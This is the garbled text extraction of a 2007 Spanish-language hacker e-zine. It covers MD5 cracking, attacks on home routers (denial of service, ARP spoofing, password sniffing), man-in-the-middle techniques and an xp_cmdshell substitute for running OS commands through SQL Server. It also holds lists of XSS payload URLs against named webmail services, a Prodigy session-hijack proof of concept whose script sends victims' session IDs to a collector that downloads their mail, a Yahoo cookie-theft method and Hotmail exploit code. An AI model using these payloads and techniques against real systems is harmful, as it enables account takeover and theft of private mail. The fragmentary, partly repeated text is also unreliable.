Professional Documents
Culture Documents
La verdad está ahí afuera, como dirían en diversos casos cuando la verdad se oculta, así es con algunos temas de
seguridad de la información en el México actual, tomemos la primer mirada a lo que nuestros colaboradores nos
envían.
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
CONTENIDO
EDI TORI AL
EDITORIAL
HackMex México
CARTA DEL COMITE DE O RGANIZACIÓN………………………………2
www.hackmex.org
HACKING FOR D UM MIES
ezine@hackmex.org
MANUAL PARA DEC IFRAR CLAVES MD5………………….....................4
LO MEJOR D EL MES
ARTICULOS DE SEGURIDAD
EN PORTADA napa@securitynation.com
www.hackmex.org ezine@hackmex.org
2
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
EDITORIAL
CARTA DEL COMITÉ DE ORGANIZACIÓN POR TAURUS
A lo largo de las diferentes etapas del movimiento hacker en el mundo se han mitificado términos e
incluso se han convertido en sinónimo de criminales, por desgracia el actuar de muchos auto nombrados
hackers en la actualidad no deja lugar a dudas que sus actos son hechos con mala intención.
Pues bien como recordaran los veteranos el tema de el hackeo comenzó como una ansia de
conocimiento y no de echar a perder sistemas computacionales, consistía en encontrar las soluciones
más eficaces y resolver problemas que se creía no tener solución.
El concepto original se ha perdido y el movimiento no se ha convertido en mas allá que una serie de
criminales que roban cuentas de banco, sacan dinero de las personas e incluso venden su información o
contraseñas, por estos motivos principales nace este proyecto con la finalidad de ser una guía educativa
e incitar a los jóvenes a realizar investigaciones serias, causando esto mejor conocimiento de la
seguridad y profesionales más preparados para el bienestar de nuestro país.
En esta ocasión todos nuestros artículos son de carácter práctico, y les tenemos preparado un surtido
muy variado en cuanto a contenido, pasando desde redes inalámbricas y telefonía, hasta 0days para
sistemas de correo muy populares y un poco de electrónica para los gamers.
Cabe destacar que en esta ocasión se ha dado paso a gente nueva así que tal vez algunos nombres les
parezcan desconocidos, pero eso no quita nivel a esta edición, hemos seleccionado los artículos
cuidadosamente y créanme que vale la pena leer la revista por completo.
Entre la iniciativa que estamos dando, no solo se trata de generar una revista de carácter mensual, si no
también de generar una serie de reuniones y platicas no para la gente que ya este en el medio si no para
todos los interesados en estar en el medio, desgraciadamente la ética y moral no la podemos inculcar,
pero si podemos dar a conocer más la información para que sea más difícil ser un delincuente en estos
términos, cada año se hará una Convención Internacional de Hackers en México, si Dios quiere claro
estos son los planes del proyecto y les agradecemos a todos el apoyo que nos brinden.
Mandamos un saludo a todos aquellos que apoyan y aportan al underground mexicano, gracias a ellos
Hackmex es YA una realidad.
www.hackmex.org ezine@hackmex.org
3
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Mucha gente me pregunta cómo se puede saber la clave de alguien cuando esta encriptado como MD5.
MD5 es un hash de 128-bits (32 caracteres).Existen otras codificaciones como DESpor ejemplo.
S OURCE CODE
Antes que nada voy a indicar como se obtiene un md5.
Es simple tan solo se lo puede hacer utilizando este código: <?php
$cadena=“juca”;
$texto_codificado=md5($cadena);
print “$texto_modificado”;
Esto lo guardas como md5.php en el navegador colocas: ?>
http:// localhost/ md5.php
Este es el texto que intentaremos descifrar con la llamada “Fuerza Bruta” La llaman asi porque lo que se
va es buscando todas las combinaciones posibles para luego mostrarnos la clave esto puede tardar
minutos o algunos días todo depende de la complejidad de la clave.
Para realizar esto existen algunos programas unos de forma grafica y otros bajo la terminal de Windows.
MD5CRACKER
www.hackmex.org ezine@hackmex.org
4
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Bueno comencemos.
MDCRACK
Este programa es excelente bueno lo pueden conseguir en esta url:
http:// membres.lycos.fr/ mdcrack/ download/ MDCrack-182.zip
Luego de que lo tengan deben saber como instalarlo nada difícil. Yo uso Windows XP por lo que lo copio
en C:\WINDOWS\ System32 Luego de que lo copias aquí ingresas a: Inicio---Ejecutar---aquí digitas
“cmd” (sin las comillas) en la pantalla negra que te aparece pones “mdcrack” (sin las comillas).
www.hackmex.org ezine@hackmex.org
5
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Para evitar que se consuman muchos recursos se puede aplastar ctrl.+alt+supr he ir a procesos donde lo
encontraremos le bajamos la prioridad esto se hace esto se hace para poder seguir trabajando mientras
trabaja nuestro programita si no se hace esto se pondrá súper lenta la maquina y no se podrá hace nada
más que correr este programa
Para guardar un resumen de lo que estamos haciendo se debe crear la carpeta tmp dentro de c:\ y
dentro de esta carpeta el archivo .mdcrack.resume
En el promt se coloca:
www.hackmex.org ezine@hackmex.org
6
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
-Passwords
Este texto explica algunos ataques que se pueden realizar posteriores a crackear la wep
de un ruteador de prodigy. Es una compilación de herramientas y técnicas conocidas.
OBTENIENDO INFORMACION
Para obtener las computadoras conectadas a la red podemos entrar en la configuración del ruteador
(http:// home o el default gateway) y ver en la parte de Home Network las computadoras y su IP. Si no
está disponible el ruteador puedes usar un programa como Look at Lan (http:// www.lookatlan.com) o
en Cain (http:// oxid.it) pueden conocer todos los hosts habilitando el sniffer y luego en el tab de Hosts
dentro de Sniffer dan click con el boton derecho del mouse y seleccionan Scan MAC.
Si se desea conocer los servicios y servidores disponibles podemos ver dentro del portal del ruteador en
la sección del firewall los servidores que tienen puertos exteriores asignados.
www.hackmex.org ezine@hackmex.org
7
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
NEGACION DE SERVICIO
Se puede reiniciar el ruteador por unos
minutos para negar el servicio a todos los
clientes, desde el portal en la parte de
Detalles en Sistema. Si no se cuenta con
password para el acceso se puede utilizar
una vulnerabilidad publicada por preth
(http:// www.mexhackteam.org/ Publics/ T
opicos/ get.php?id_codigo=2) para reiniciarlos.
www.hackmex.org ezine@hackmex.org
8
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Utilizando Spoofing se
puede bloquear al acceso
a sitios específicos.
SPOOFING
www.hackmex.org ezine@hackmex.org
9
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
SNIFFING
Al habilitar APR Poison Routing con Cain podemos utilizar el WireShark (http:// www.wireshark.com) y
ver la comunicación del host que hayamos seleccionado.
También podemos ver los passwords que se envía en la parte de passwords del Cain.
www.hackmex.org ezine@hackmex.org
10
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
S OURCE CODE
#pragma comment(lib,"libws2_32.a")
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include "winsock2.h"
www.hackmex.org ezine@hackmex.org
11
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
S OURCE CODE
strcat(badreq,argv[3]);
strcat(badreq,"=%0D%0A HTTP/ 1.0\ r\ n");
strcat(badreq,"Accept-Language: es-mx\ r\ n");
strcat(badreq,"User-Agent: MexHackTeam\ r\ n");
strcat(badreq,"Host: ");
strcat(badreq,argv[1]);
strcat(badreq, "\ r\ n\ r\ n\ r\ n");
send(wsck , badreq ,(int)strlen(badreq), 0);
printf("\ nDatos Mandados!..");
// finalized
Sleep(100);
printf("\ nThat's all, Check this out!...\ n");
WSACleanup();
return 0;}
www.hackmex.org ezine@hackmex.org
12
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO
MERO 1 JUNIO 2007 HackMex 1
ARTICULOS DE SEGURIDAD
MAN IN THE MIDDLE POR HKM
hkm@hakim.ws, http:/ / www.hakim.ws
Que es MITM
Definición y Alcance
Métodos de Autenticación vulnerados
Métodos para realizar MITM
Dns Spoofing y Poisoning (local, lan y via wifi)
Access Point Falso
Proxy Spoofing
ARP Spoofing
Man in The Browser
MITM con AJAX / cURL
Definición y Alcance
“Man in The Middle”
traducido al español seria
“Hombre En Medio” u
“Hombre en el medio” se
refiere a que existe alguien
en medio de la
comunicación entre el
origen y el destino.
El atacante puede observar, interceptar, modificar y retransmitir la información, lo que da origen a los
siguientes posibles ataques posteriores:
> Sniffing
www.hackmex.org ezine@hackmex.org
13
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Cookie del Navegador / Preguntas Las cookies pasan por el atacante, o si se pierden,
secretas se le solicitan preguntas al usuario que pasan por el
atacante quedándose con las respuestas secretas.
Texto personalizado o imagen para Ya teniendo las respuestas secretas también es fácil
identificación personal conocer el texto personalizado o la imagen personal.
www.hackmex.org ezine@hackmex.org
14
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
❷STP mangling
❷Port stealing
❷DHCP spoofing
❷ICMP redirection
❷IRDP spoofing - route mangling
❷Traffic tunneling
Cuando se realiza este tipo de ataques la velocidad de la conexión se ve afectada ya que aunque la
mayoría son para la red local la información tiene que viajar por uno o varios nodos.
Diferentes tipos de malware utilizan este método para bloquear actualizaciones de antivirus,
herramientas y páginas de seguridad.
Se requiere acceso completo al sistema que se quiere envenenar, ya sea físicamente o usando alguna
herramienta de administración remota y requiere permisos de Administrador por lo que tiene sus
limitantes.
www.hackmex.org ezine@hackmex.org
15
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Ya estando dentro de la red, la mayoría de las personas no tienen password para proteger la
configuración de su ruteador. Es sencillo redirigir el servidor DNSa uno propio con direcciones falsas.
www.hackmex.org ezine@hackmex.org
16
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO
MERO 1 JUNIO 2007 HackMex 1
Existe una vulnerabilidad en el algoritmo de conexión a redes preferidas en windows que permite a un
atacante conocer los SSIDs de sus redes preferentes. En Linux esto se puede hacer con una herramienta
llamada Karma (http:// www.theta44.org/ karma/ ) que te permite conocer los –clientes
clientes- inalámbricos y
falsificar el SSID.
www.hackmex.org ezine@hackmex.org
17
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Caín es una excelente herramienta para esto, solamente seleccionamos el Sniffer y dando click en APR
en el tab de host seleccionamos Scan MAC ya que tenemos los hosts nos vamos a la parte de Routing y
seleccionamos + para redirigir la comunicación entre los hosts que seleccionemos.
No debemos seleccionar todos los hosts de la lista porque es probable que causemos una negación de
servicio.
www.hackmex.org ezine@hackmex.org
18
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Existen los llamados BHOs o Browser Helper Objects para Internet Explorer y los plugins de firefox, así
como código que se inserta en el navegador, que cuando la victima ingresa a algún sitio marcado estos
programas capturan el tráfico, lo modifican y lo pueden redirigir.
www.hackmex.org ezine@hackmex.org
19
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO
MERO 1 JUNIO 2007 HackMex 1
Referencias:
www.hackmex.org ezine@hackmex.org
20
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
ARTICULOS DE SEGURIDAD
SUSTITUTO PARA XP_CMDSHELL POR NAPA
SN_SHELL es un procedimiento que permite ejecutar comandos al nivel del sistema operativo a través
del servidor SQL sin la necesidad de contar con el famosos xp_cmdshell o en su caso si esta desactivado
o la DLL fue borrada del disco duro, es una forma alterna de pasar al nivel del sistema de una forma
sencilla y limpia
S OURCE CODE
/*
#########################################################################
# THISSCRIPT ISA REPLACEMENT OF XP_CMDSHELL FOR ANY WINDOWSSERVER. #
# THE AUTHOR ISNOT RESPONSIBLE FOR ITSUSE. #
# CODED BY: LUISALBERTO CORTESZAVALA MAIL. napa@securitynation.com#
# WEBSITE: www.securitynation.com #
########################################################################
THISPROCEDURE REPLACESTHE NEED FOR XP_CMDSHELL NO DLL ISREQUIRED,
YOU CAN USE IT FOR ALMOST ANY COMMAND AND GET OUTPUT IN THE QUERY
ANALIZER.
www.hackmex.org ezine@hackmex.org
21
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
EN PORTADA
XSS EN SISTEMAS DE CORREO POR PRETH00NKER, NAPA, PSYMERA, GEMU
En la actualidad los ataques de xss (Cross Site Script), han adquirido una tremenda popularidad
en el medio, esto se debe a enorme facilidad que un atacante tiene para detectarlos, añadido la
posibilidad latente de que un programador no testee una variable de manera correcta o hasta una
entrada indirecta (refiriéndome mayoritariamente a los sistemas robustos como foros, sistemas de
correo, CMS, etc..), es probable que algunas personas jamás se enteren de que sus sistemas son
vulnerables a este tipo de ataques debido a la ignorancia y poca actualización en el tema.
Periódicamente en nuestro portal http:// www.hackmex.org ustedes podrán consultar una serie
de “ Tools” y servicios donde les será posible explotar dichos fallos de manera sencilla y con resultados
complacientes, posteriormente estos sistemas serán abiertos al público con propósitos educativos.
Hackmex tiene como propósito ofrecer soluciones, por lo tanto, algunos días después de la
publicación de este artículo Hackmex volverá a emitir una publicación más donde ofreceremos
recomendaciones bastante aplicables de lo que para nosotros tanto son los errores más comunes como
los puntos más críticos para solucionar este tipo de conflictos o reducirlos al más mínimo riesgo para los
usuarios comunes.
Así mismo los proveedores del servicio han trabajado con nuestro equipo hacinedo posible la
solución de varios problemas los cuales hemos hallado, a continuación una carta de agradecimiento de
Microsoft a NaPa por la ayuda en los sistemas de correo:
www.hackmex.org ezine@hackmex.org
22
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
CARTA
Dear Luis:
Thank you for your recent efforts in responsibly disclosing and working with Microsoft to
investigate security issues within Microsoft Hotmail. Microsoft places a high value on the
relationships formed with security professionals and customers while working to investigate
and resolve reported security issues.
In particular during the MSRC investigation of case 5937 we thank you for:
Microsoft recognizes and appreciates the commitment you have made to help us secure our
products for our customers. The security of our products and services, and partnership with
security researchers is a top priority of the Microsoft Security Response Center.
Sincerely,
Scott Deacon
Microsoft Corporation
FAL L OS p s yme r a
http://webmail-temp.latinmail.com/mensajes?folder=recibidos%3Cscript%3Ealert(%22Holas%22);%3C/script%3E
http://digiland.libero.it/profilo.phtml?nick=%3Cscript%3Ejavascript:alert(1);%3C/script%3E&top=1
http://digiland.libero.it/profilo.phtml?nick=%3Cscript%3Ealert(document.cookie);%3C/script%3E&top=1
http://service.gmx.net/de/cgi/login?LANG=de&CUSTOMERNO=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E&ALIAS=&DOMAIN
=&AREA=2
http://service.gmx.net/de/cgi/login?LANG=de&CUSTOMERNO=&ALIAS=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E&DOMAIN
=&AREA=2
http://service.gmx.net/de/cgi/login?LANG=de&CUSTOMERNO=&ALIAS=&DOMAIN=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3
E&AREA=2
http://service.gmx.net/de/cgi/login?LANG=de&CUSTOMERNO=&ALIAS=&DOMAIN=&AREA=2http://service.gmx.net/de/cgi/login?LA
NG=de&CUSTOMERNO=&ALIAS=&DOMAIN=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E&AREA=2
http://mail.ubbi.com/popup_meregistre.asp?u=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E
http://mail.ubbi.com/popup_meregistreclarin.asp?u=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E
http://secure.ubbi.com/registracion/Recupero_Pass.asp?srv=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E
https://reg.163.com/logins.jsp?type=1&url=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E
http://login.conexcol.com/index.mpc?username=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E
http://login.conexcol.com/index.mpc?password=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E
http://login.conexcol.com/index.mpc?domain=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E
https://register.go.com/go/login?aff_code=gomail3%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E&cookieDomain=.go.co
m&appRedirect=
https://register.go.com/go/login?aff_code=gomail3&cookieDomain=.go.com%22%3Cscript%3Ealert(%22hola%22);%3C/script%3
E&appRedirect=
www.hackmex.org ezine@hackmex.org
23
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
https://register.go.com/go/sendPassword?aff_code=go%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E&appRedirect=https%
3A%2F%2Fregister.go.com%2Fgo%2FgoMail
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E
http://secure2.ciudad.com.ar/registracion/Registracion_Login1.asp?srv=9&e=1&u=&PD=%22%3Cscript%3Ealert(%22hola%22);%
3C/script%3E
http://secure2.ciudad.com.ar/registracion/Recupero_Pass.asp?srv=9%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E%22%3
E%3Cscript%3Ealert(%22hola%22);%3C/script%3E
%22%3E%3Ch1%3E123456
"><h1>123456
------no mails-------
http://atmail.com/support_doc.php?doc=migrate-users%22%3Cscript%3Ealert(%22hola%22);%3C/script%3E
http://atmail.com/support_doc.php?doc=migrate-users%00
Actualmente en México, el sistema de correos Prodigy es uno de los más utilizados, debido a su
usabilidad, practicidad y efectividad, proporcionando servicios como: correo electronico, HD virtual,
libreta de direcciones, calendario, etc.
Cross site script: es una técnica de inyección de código arbitrario, para el cual, un atacante
puede tomar ventaja del contenido de la ventana actual, donde la página está siendo visualizada.
Identificador de sesión: es una cadena única con la cual, el sistema es capaz de identificar a un usuario
como tal.
[Explicación]
Un atacante, podría fabricar un correo electrónico mal intencionado incluyendo algunas líneas
de código parecidas a estas;
<IMG src="javascript:alert(document.getElementsByName('ID')[0].value);">
Así, obtener el identificador de sesión del usuario víctima y sobrepasar la autentificación dentro
del sistema; De esta manera un atacante podría hacer un frm como el siguiente; Y así llegar hasta el
primer mensaje de la bandeja de entraida.
<!--
[ Correos Prodigy ] P o C Authenticatión Bypass By Preth00nker -->
<form method="POST" action="http://webmail.prodigy.net.mx/cgi-bin/webmail" name="ActionForm">
<!-- Aquì | El ID -->
<!-- V -->
<input type="hidden" name="ID" value="">
<input type="hidden" name="Act_View" value="1">
<input type="hidden" name="msgID" value="1">
<input type="hidden" name="R_Folder" value="SU5CT1g=">
<br><input type=submit Value="Accionar">
</form>
www.hackmex.org ezine@hackmex.org
24
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
}else{
?>
<p><span class="style2">[ Prodigy PoC ]</ span></ p>
<form action='<? echo $_SERVER['PHP_SELF'];?>?modle=Prodigy' method="post">
<table width=80%>
<tr><td width=30%>Mail From: </ td><td><input type=text name=atacker / ></ td></ tr>
<tr><td>Victim's Mail: </ td><td><input type=text name=victim / ></ td></ tr>
<tr><td colspan=2 align=right><input type=submit value=Send / ></ td></ tr>
</ table>
</ form>
/ Shellcodes/ poc3:
<img src="javascript:
var id=escape(document.getElementsByName('ID')[0].value);
document.write('<iframe height=1 width=1 frameborder=0 marginwidth=0 marginheight=0 scrolling=no src=http:// 127.0.0.1/ id_saver.php?id=');
document.writeln(id);
document.writeln('></ iframe>');
setInterval('history.go(-2)',2000);
">
/ id_saver.php:
<?php
$id=strip_tags($_GET[id]);
if ($id!=""){
@mkdir("../ Victims/ Prodigy/ $id/");
/ / Vars
$host="webmail.prodigy.net.mx";
$port=80;
set_time_limit(99999);
$count=1;
$packet="";
$resp="";
/ / Empaqueta
$hwnd = fopen("head.txt","r");
$header = fread($hwnd,filesize("head.txt"));
fclose($hwnd);
$string="ID=".$id."&Act_View=1&msgID=$count&R_Folder=SU5CT1g%3D";
$len=strlen($string);
$packet=$header.$len."\ r\ n\ r\ n".$string;
$socket=fsockopen($host,$port,$errno,$errstr);
fwrite($socket,$packet);
/ / Salva
$hwndl=fopen("../ Victims/ Prodigy/ $count.html","w+");
while (!feof($socket)){
$resp.=fgets($socket);
}
$code=explode("<html>",$resp);
fwrite($hwndl,"<html>".$code[1],strlen($resp)-5);
fclose($hwndl);
fclose($socket);
while(!stristr($resp,"Msg_Sel_")){
$count++;
www.hackmex.org ezine@hackmex.org
25
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
$packet="";
$resp="";
$string="ID=".$id."&Act_View=1&msgID=$count&R_Folder=SU5CT1g%3D";
$len=strlen($string);
$packet=$header.$len."\ r\ n\ r\ n".$string;
$socket=fsockopen($host,$port,$errno,$errstr);
fwrite($socket,$packet);
$hwndl=fopen("../ Victims/ Prodigy/ $id/$count.html","w+");
while (!feof($socket)){
$resp.=fgets($socket);
}
$code=explode("<html>",$resp);
fwrite($hwndl,"<html>".$code[1],strlen($resp)-5);
fclose($hwndl);
fclose($socket);
}
}
?>
DESCRIPCION
Este XSS está bajo el dominio yahoo.com, el mismo que usa mail.yahoo.com como path para las cookies
de sesión. Aun así, para poder acceder a la cuenta de correo se necesita una cookie de validación con
path solo en mail.yahoo.com, la cual no es accesible directamente por el XSS.
EXPLOTACION
Conseguir por cualquier medio que la victima acceda a una URL alterada que capture la cookie por
javascript (document.cookie) y nos la envié ya se a nuestro correo a un sistema de proceso
automatizado.
Una vez tenemos las cookies de sesión (es recomendable coger todas) necesitamos obtener la cookie
del dominio mail.yahoo.com, esta no podemos robársela a la victima pero si solicitarla sin mayores
problemas al servidor de yahoo.
Basta con acceder a la sig. url enviando las cookies previamente capturadas
http:// es.f281.mail.yahoo.com/ ym/ login?ymv=0
::Ejemplo de HTTP::
GET / ym/ login?ymv=0 HTTP/ 1.1
Host: es.f281.mail.yahoo.com
User-Agent: Mozilla/ 5.0
Cookie: [todas las cookies capturadas anteriormente]
Connection: Close
www.hackmex.org ezine@hackmex.org
26
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
A lo que el servidor nos responderá con nuevas cookies en el parámetro "Set-Cookie", que debemos
adicionar el grupo de ya teníamos robadas. Con este grupo ya tenemos todas las cookies necesarias para
validar el correo yahoo, y cualquier petición a la bandeja de entrada o a un mail especifico validara la
cookie y nos dejara entrar sin problemas.
En el 2005 reporte 2 fallos diferentes de Hotmail, cuando envié los fallos a las listas de
seguridad, fui contactado casi de forma inmediata por el Microsoft Security Response Center, y a partir
de ese momento comencé a trabajar con ellos para este tipo de fallos. Estas vulnerabilidades jamás
fueron publicadas en securityfocus, de la misma forma Microsoft no tiene una publicación para ellas,
estas fueron:
Antes
Ahora
Después de estos cambios se supone que mis vulnerabilidades no funcionarían mas, y así fue
durante un tiempo, el mes pasado estaba probando algunos fallos que encontré en la versión Windows
Mail Live, y solo trabaja con esta versión del correo, “Windows Live Mail Inbox Bypass” pero por lógica
una de mis pruebas es tratar de ver qué diferencias y fallos en comunes encontraba en los dos sistemas
el classic y el live, así que abrí una cuenta de correo clásica, y no se imaginan cual fue mi sorpresa al ver
que las actualizaciones que había hecho Microsoft en la actualidad no funcionaban!!
www.hackmex.org ezine@hackmex.org
27
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Después de revisar los códigos y hacer algunas pruebas contacte con la gente de Microsoft la
cual me comento que si estaba arreglado y después de hacer la investigación se dieron cuenta que había
habido un roll back, es decir, des-parcharon el sistema y lo dejaron vulnerable!
Al día siguiente tuve una plática con el staff de Hotmail, el cual quedamos que el fallo quedaría
reparado a mediados de abril de 2007 y mientras tanto, ningún detalle técnico seria revelado, aquí
expondré algunas cosas, hasta donde pueda sin embargo sin exploits, lanzadores ni códigos.
* NOTA: La edición de esta revista se demoro 2 meses por lo que Microsoft ya ha parchado la mayoría de
estas vulnerabilidades. Por lo tanto publicaremos exploits y detalles técnicos.
Por Napa
Author: Luis Alberto Cortes Zavala
Email: napa@securitynation.com
Website: http:// www.securitynation.com
Language: JavaScript
Version: Last Hotmail Update
Type: Code Execution
Exploitation: Remote, Client Side
st
Vendor Advice: 1 February 2007
Vendor URL: http:// www.hotmail.com
He probado Hotmail desde hace mucho tiempo, la autorización y validación es una de las mas auditadas
en el mundo tan solo imaginen cuantas personas al día han tratado de encontrar algún fallo en el
sistema, es técnicamente improbable que alguien lo logre.
Descripción
Los fallos se deben a la forma del manejo de los archives adjuntos del correo de Hotmail, de la forma en
que hotmail lo usa podemos ejecutar código arbitrario en la interfaz del usuario, poniendo en riesgo
toda la información sensitiva de este.
www.hackmex.org ezine@hackmex.org
28
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Esto es posible debido a fallos estratégicos del sistema, y la forma en que se manejan en específico los
archives HTML.
Ex p l o it p o c
####################################################################
#HOTMAIL ANTIVIRUSBYPASSVERSION 2
####################################################################
<html>
<head>
</ head>
<body>
<script>
str1=document.URL;
str2=str1.split("?");
str3=str2[1];
str4=str3.split("&");
str5=str4[1]+"&"+str4[2]+"&"+str4[3]+"&mimepart=";
str6=str4[4];
str7=str6.split("=");
str8=str7[1];
str9=parseInt(str8)+1;
str10=str5+str9
str20=str4[5];
str20=xreplace(str20,"-","%2d");
str21=str10+"&"+str20;
str11="http:/ / by105fd.bay105.hotmail.msn.com/ cgi-bin/ getmsg?&";
str12=str11+str21;
self.location=str12;
function xreplace(checkMe,toberep,repwith){
var temp = checkMe;
var i = temp.indexOf(toberep);
while(i > -1){
temp = temp.replace(toberep, repwith);
i = temp.indexOf(toberep, i + repwith.length + 1);}
return temp;}
</ script>
</ body>
</ html>
Imágenes
www.hackmex.org ezine@hackmex.org
29
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
He probado Hotmail desde hace mucho tiempo, la autorización y validación es una de las mas auditadas
en el mundo tan solo imaginen cuantas personas al día han tratado de encontrar algún fallo en el
sistema, es técnicamente improbable que alguien lo logre.
Descripción
Los fallos se deben a la forma del manejo de los archives adjuntos del correo de Hotmail, de la forma en
que hotmail lo usa podemos ejecutar código arbitrario en la interfaz del usuario, poniendo en riesgo
toda la información sensitiva de este.
Esto es posible debido a fallos estratégicos del sistema, y la forma en que se manejan en específico los
archives HTML.
Ex p l o it p o c
<html>
<head>
</ head>
<body>
<script>
str1=document.URL;
str2=str1.split("?");
str3=str2[1];
str4=str3.split("&");
str5=str4[1];
str6=str5.split("=");
str7=str6[1];
str8="http:// by105fd.bay105.hotmail.msn.com/ cgi-bin/ getmsg?msg=&start=&len=&mfs=&cmd=next&lastmsgid=";
str9="&msgread=&etype=&wo=&curmbox=00000000%2d0000%2d0000%2d0000%2d000000000001";
str10=str8+str7+str9;
document.write(str10);
self.location=str10;
</ script>
</ body>
</ html>
www.hackmex.org ezine@hackmex.org
30
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
www.hackmex.org ezine@hackmex.org
31
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
He probado Hotmail desde hace mucho tiempo, la autorización y validación es una de las mas auditadas
en el mundo tan solo imaginen cuantas personas al día han tratado de encontrar algún fallo en el
sistema, es técnicamente improbable que alguien lo logre.
Descripción
Los fallos se deben a la forma del manejo de los archives adjuntos del correo de Hotmail, de la forma en
que hotmail lo usa podemos ejecutar código arbitrario en la interfaz del usuario, poniendo en riesgo
toda la información sensitiva de este.
Esto es posible debido a fallos estratégicos del sistema, y la forma en que se manejan en específico los
archives HTML.
Ex p l o it p o c
POST
http:// by122w.bay122.mail.live.com/ mail/ mail.fpp?cnmn=Microsoft.Msn.Hotmail.MailBox.SendMessage_ec&ptid=0&a=FL4hAR
m0OUtJNGA%2bBzVQow%3d%3d&au=734537521 HTTP/ 1.1
Accept: * / *
Accept-Language: es-mx
Referer: http:// by122w.bay122.mail.live.com/ mail/ ApplicationMain_11.09.0000.0120.aspx?culture=es-MX&hash=734537521#
Content-Type: application/ x-www-form-urlencoded
x-fpp-command: 0
UA-CPU: x86
User-Agent: Mozilla/ 4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: by122w.bay122.mail.live.com
Content-Length: 299
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [SIGIN COOKIES]
cn=Microsoft.Msn.Hotmail.MailBox&mn=SendMessage_ec&d=victima%40hotmail.com,SPOOFED@ADDRESS.COM,%22%22,%22
%22,0,SUBJECT,HTMLBODY,[],null,%2200000000-0000-0000-0000-
000000000004%22,null,0,false,false,[],null&v=1&mt=1ebe3cf6f1fdb887ad307534dbed6fad751eda67
Imágenes
www.hackmex.org ezine@hackmex.org
32
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Después de el exploit como verán, llego al inbox directamente, saltándonos toda validación de correo de
Hotmail, e inclusive el remitente es: chacho@chacho.com no existente y sin SPF validos en ningún DNS;
pero aun así Hotmail lo reconoce.
Puedes enviar correo a todas las versiones: Hotmail, and Windows Mail Live.
www.hackmex.org ezine@hackmex.org
33
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
SISTEMAS OPERATIVOS
INSTALACION DE OPENBSD 4.0 POR KANZER
Inicien su ordenador entren al BIOS y que bootear con cd-rom o dvd etc..
Iniciara una consolita muy linda que parece la de matrix solo que en azul, quiere decir que el
núcleo del sistema se esta cargando en RAM y algunas aplicaciones del Cd.
rootdev=0x1100 rrootdev=0x2f00 rawdev=0x2f02 erase ^?, werase ^W, kill ^U, intr ^C,
status ^T (I)nstall, (U)pgrade or (S)hell? i
Welcome to the OpenBSD/i386 4.0 install program. This program will help you install
OpenBSD in a simple and rational way. At any prompt except password prompts you can
run a shell command by typing '!foo', or escape to a shell by typing '!'. Default
answers are shown in []'s and are selected by pressing RETURN. At any time you can
exit this program by pressing Control-C and then RETURN, but quitting during an
